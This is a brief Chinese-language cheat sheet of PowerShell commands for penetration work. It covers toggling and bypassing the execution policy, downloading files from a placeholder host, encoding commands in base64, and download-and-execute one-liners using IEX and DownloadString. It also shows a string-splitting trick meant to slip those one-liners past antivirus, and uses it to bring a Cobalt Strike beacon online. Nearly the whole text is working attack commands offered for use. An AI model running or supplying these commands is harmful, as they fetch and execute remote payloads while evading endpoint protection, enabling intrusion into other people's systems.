powershell渗透常用命令

set-ExecutionPolicy RemoteSigned //开启执行策略
set-ExecutionPolicy Restricted //关闭执行策略

远程下载文件

powershell
$h=new-object System.Net.WebClient
$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')

命令行执行ps1文件

powershell.exe -ExecutionPolicy bypass -File "C:\Users\xx\Desktop\test\1.ps1"

远程下载并执行

whoami文件内容

##查看当前权限
$command = "whoami" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -encodedCommand $encodedCommand

正常执行会被AV拦截

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/whoami.ps1')"

bypass

先将命令拆分为字符串，然后进行拼接

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/whoami.ps1'')'.Replace('11','adString');IEX ($a+$b)"  

上线cs

正常powershell命令

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xx.com/payload/powershell/muet.ps1')"

拆分命令

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xx.com/payload/powershell/muet.ps1'')'.Replace('11','adString');IEX ($a+$b)"